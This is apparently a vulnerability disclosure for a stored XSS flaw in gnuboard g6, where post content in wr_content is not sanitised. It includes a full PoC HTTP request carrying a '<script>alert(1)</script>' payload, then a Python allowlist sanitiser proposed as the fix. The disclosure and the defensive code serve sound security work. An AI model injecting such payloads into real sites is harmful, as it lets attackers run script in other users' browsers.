Hello.
Currently, there is a vulnerability in Gnuboard g6 that allows a `<script>` tag to be written into comments when posting.
### [Name of affected Product]
gnuboard 6
### [Affected version]
https://github.com/gnuboard/g6/commit/f5dd7b84c4bc943c53c3f8b7096de508ae2e7c38
### [Vulnerability Type]
* Stored XSS
### [Affected Component]
`board.py`, all posts
### [Root Cause]
* While writing a reply on a post, the `wr_content` parameter is not sanitized for HTML tags, so posting a reply that contains HTML tags results in a Stored XSS attack.
### [Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1eb09079-f94e-4034-842a-b50a1ae32baa
As shown in the video above, the `wr_content` web parameter can be modified arbitrarily to contain HTML tags when writing a post, and when a `<script>` tag is inserted, a Stored XSS attack is possible.
It seems necessary either to check for and strip the script tag directly within the `write_update` function in `board.py`, or to HTML-escape the content.
Below is the PoC web request.
```
POST /board/write_update/free? HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 1792
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySgFBdm7sWhgsJGVH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/write/free
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogIjhkNzgyMWMwZGI5MzUzZjg4MWFkOTRkZDVmZjJiYzhkIn0=.ZahUdQ.BiPBCxMiQMixJW06yEnmBeE4zGw
Connection: close
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="uid"
2024011717272327
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="parent_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="token"
8d7821c0db9353f881ad94dd5ff2bc8d
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_name"
test
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_password"
tes
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_email"
ttes@naver.com
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_homepage"
tetest
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="html"
html1
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_subject"
set
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_content"
<p>settt</p><script>alert(1)</script>
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="option"
html2
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link1"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link2"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH--
```
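The two remedies suggested above (escape the body, or strip dangerous tags) can be combined into one server-side filter applied to `wr_content` before it is stored. The following is an added example and not gnuboard g6 code: the function name `sanitize_wr_content`, the tag/attribute allowlist and the `html_allowed` flag (standing in for the form's `html` option) are assumptions for illustration.

```python
"""Allowlist HTML sanitiser for a board post body such as ``wr_content``.

Added example, not gnuboard g6 code: ``sanitize_wr_content``, the allowlists
and the ``html_allowed`` flag are assumptions made for this illustration.
"""
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}          # every other attribute is dropped
VOID_TAGS = {"br"}                       # never emit a closing tag for these
SAFE_SCHEMES = ("http://", "https://", "mailto:", "/")


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0   # > 0 while inside <script>/<style>; their text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return              # unknown tag: drop the tag but keep its text content
        parts = []
        for name, value in attrs:
            # on* handlers and anything outside the per-tag allowlist are removed
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue        # blocks javascript:, data:, vbscript: and friends
            parts.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(parts)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if not self._skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))  # re-escape text nodes


def sanitize_wr_content(raw: str, html_allowed: bool) -> str:
    """Escape everything when HTML is off; otherwise keep only allowlisted markup."""
    if not html_allowed:
        return html.escape(raw, quote=True)
    parser = _Sanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)
```

Run on the PoC body `<p>settt</p><script>alert(1)</script>` with HTML allowed, the result is `<p>settt</p>`; with HTML disabled the whole body is entity-escaped. The stdlib parser is not browser-grade, so a maintained sanitiser library is preferable in production, but the allowlist-plus-escape structure shown here is the shape the fix in `write_update` needs.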